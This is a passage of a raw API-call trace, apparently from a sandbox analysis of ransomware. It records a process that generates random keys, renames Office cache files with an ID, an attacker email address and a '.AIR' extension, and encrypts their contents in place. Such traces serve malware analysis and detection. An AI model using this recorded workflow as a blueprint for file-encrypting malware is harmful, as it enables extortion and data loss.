1 [0145.478] WriteFile (in: hFile=0x4a4, lpBuffer=0x2acf9c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x2acf9c0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0145.478] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x5f00000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.478] ReadFile (in: hFile=0x4a4, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0145.501] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5f00000 [0145.501] WriteFile (in: hFile=0x4a4, lpBuffer=0x34e0020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x34e0020*, lpNumberOfBytesWritten=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0145.504] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0xa97cce3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.504] WriteFile (in: hFile=0x4a4, lpBuffer=0x2acf9c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x2acf9c0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0145.504] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x7200000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.504] ReadFile (in: hFile=0x4a4, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0145.517] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7200000 [0145.517] WriteFile (in: hFile=0x4a4, lpBuffer=0x34e0020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x34e0020*, lpNumberOfBytesWritten=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0145.520] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0xa97cce3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.520] WriteFile (in: hFile=0x4a4, lpBuffer=0x2acf9c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x2acf9c0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0145.520] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x8500000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.520] ReadFile (in: hFile=0x4a4, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0145.526] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8500000 [0145.526] WriteFile (in: hFile=0x4a4, lpBuffer=0x34e0020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x34e0020*, lpNumberOfBytesWritten=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0145.528] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0xa97cce3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.528] WriteFile (in: hFile=0x4a4, lpBuffer=0x2acf9c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x2acf9c0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0145.529] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x9800000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.529] ReadFile (in: hFile=0x4a4, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0145.542] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9800000 [0145.542] WriteFile (in: hFile=0x4a4, lpBuffer=0x34e0020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x34e0020*, lpNumberOfBytesWritten=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0145.544] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0xa97cce3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.544] WriteFile (in: hFile=0x4a4, lpBuffer=0x2acf9c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x2acf9c0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0145.544] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33d0020 | out: hHeap=0x2e0000) returned 1 [0145.549] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e0020 | out: hHeap=0x2e0000) returned 1 [0145.583] CloseHandle (hObject=0x4a4) returned 1 [0145.922] GetProcessHeap () returned 0x2e0000 [0145.922] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0145.922] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0145.922] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0145.922] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385a10 | out: hHeap=0x2e0000) returned 1 [0145.922] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385968 | out: hHeap=0x2e0000) returned 1 [0145.922] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385968 [0145.922] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0145.922] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0145.922] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0145.922] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0145.922] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", dwFileAttributes=0x80) returned 1 [0145.924] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 78 [0145.924] GetProcessHeap () returned 0x2e0000 [0145.924] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x102) returned 0x30d0110 [0145.924] lstrcpyW (in: lpString1=0x30d0110, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" [0145.924] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.12781717671972518758.ex_parvis@aol.com.AIR" [0145.924] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0145.927] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a4 [0145.927] GetProcessHeap () returned 0x2e0000 [0145.927] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30d0110 | out: hHeap=0x2e0000) returned 1 [0145.927] GetFileSizeEx (in: hFile=0x4a4, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=16852) returned 1 [0145.927] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x41d4 [0145.927] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0145.927] GetProcessHeap () returned 0x2e0000 [0145.927] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0145.927] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0145.927] WriteFile (in: hFile=0x4a4, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0145.929] WriteFile (in: hFile=0x4a4, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0145.929] WriteFile (in: hFile=0x4a4, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0145.929] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x41d4) returned 0x3a7410 [0145.929] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x41d4) returned 0x3ab5f0 [0145.929] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.929] ReadFile (in: hFile=0x4a4, lpBuffer=0x3a7410, nNumberOfBytesToRead=0x41d4, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3a7410*, lpNumberOfBytesRead=0x2acf9c8*=0x41d4, lpOverlapped=0x0) returned 1 [0145.930] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-16852, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.930] WriteFile (in: hFile=0x4a4, lpBuffer=0x3ab5f0*, nNumberOfBytesToWrite=0x41d4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3ab5f0*, lpNumberOfBytesWritten=0x2acf9c8*=0x41d4, lpOverlapped=0x0) returned 1 [0145.930] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7410 | out: hHeap=0x2e0000) returned 1 [0145.931] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3ab5f0 | out: hHeap=0x2e0000) returned 1 [0145.932] CloseHandle (hObject=0x4a4) returned 1 [0145.933] GetProcessHeap () returned 0x2e0000 [0145.933] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0145.933] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0145.933] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0145.933] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385968 | out: hHeap=0x2e0000) returned 1 [0145.933] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3858c0 | out: hHeap=0x2e0000) returned 1 [0145.933] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x3858c0 [0145.933] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0145.933] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0145.933] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0145.933] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0145.933] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi", dwFileAttributes=0x80) returned 1 [0145.934] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 78 [0145.934] GetProcessHeap () returned 0x2e0000 [0145.934] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x102) returned 0x30d0110 [0145.934] lstrcpyW (in: lpString1=0x30d0110, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi" [0145.934] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi.12781717671972518758.ex_parvis@aol.com.AIR" [0145.934] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0145.937] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a4 [0145.937] GetProcessHeap () returned 0x2e0000 [0145.937] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30d0110 | out: hHeap=0x2e0000) returned 1 [0145.937] GetFileSizeEx (in: hFile=0x4a4, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=27532288) returned 1 [0145.937] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x1a41c00 [0145.937] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0145.937] GetProcessHeap () returned 0x2e0000 [0145.937] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0145.937] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0145.937] WriteFile (in: hFile=0x4a4, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0145.939] WriteFile (in: hFile=0x4a4, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0145.939] WriteFile (in: hFile=0x4a4, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0145.939] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x1a41c00) returned 0x33d0020 [0145.940] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x1a41c00) returned 0x4e20020 [0145.941] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.941] ReadFile (in: hFile=0x4a4, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x1a41c00, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x1a41c00, lpOverlapped=0x0) returned 1 [0146.969] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-27532288, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.970] WriteFile (in: hFile=0x4a4, lpBuffer=0x4e20020*, nNumberOfBytesToWrite=0x1a41c00, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x4e20020*, lpNumberOfBytesWritten=0x2acf9c8*=0x1a41c00, lpOverlapped=0x0) returned 1 [0147.405] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33d0020 | out: hHeap=0x2e0000) returned 1 [0147.514] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x4e20020 | out: hHeap=0x2e0000) returned 1 [0147.639] CloseHandle (hObject=0x4a4) returned 1 [0148.069] GetProcessHeap () returned 0x2e0000 [0148.069] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0148.069] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0148.069] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0148.069] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3858c0 | out: hHeap=0x2e0000) returned 1 [0148.069] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385818 | out: hHeap=0x2e0000) returned 1 [0148.069] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30d0110 [0148.069] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0148.069] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0148.069] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0148.069] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0148.069] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms", dwFileAttributes=0x80) returned 1 [0148.071] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 88 [0148.071] GetProcessHeap () returned 0x2e0000 [0148.071] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x116) returned 0x30d01d8 [0148.071] lstrcpyW (in: lpString1=0x30d01d8, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" [0148.071] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.12781717671972518758.ex_parvis@aol.com.AIR" [0148.071] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0148.075] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a4 [0148.075] GetProcessHeap () returned 0x2e0000 [0148.075] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30d01d8 | out: hHeap=0x2e0000) returned 1 [0148.075] GetFileSizeEx (in: hFile=0x4a4, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=715834) returned 1 [0148.075] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xaec3a [0148.075] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0148.075] GetProcessHeap () returned 0x2e0000 [0148.075] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0148.076] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0148.076] WriteFile (in: hFile=0x4a4, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0148.077] WriteFile (in: hFile=0x4a4, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0148.077] WriteFile (in: hFile=0x4a4, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0148.077] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xaec3a) returned 0x33d0020 [0148.078] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xaec3a) returned 0x3480020 [0148.078] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.078] ReadFile (in: hFile=0x4a4, lpBuffer=0x33d0020, nNumberOfBytesToRead=0xaec3a, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0xaec3a, lpOverlapped=0x0) returned 1 [0148.097] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-715834, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.097] WriteFile (in: hFile=0x4a4, lpBuffer=0x3480020*, nNumberOfBytesToWrite=0xaec3a, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3480020*, lpNumberOfBytesWritten=0x2acf9c8*=0xaec3a, lpOverlapped=0x0) returned 1 [0148.099] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33d0020 | out: hHeap=0x2e0000) returned 1 [0148.102] 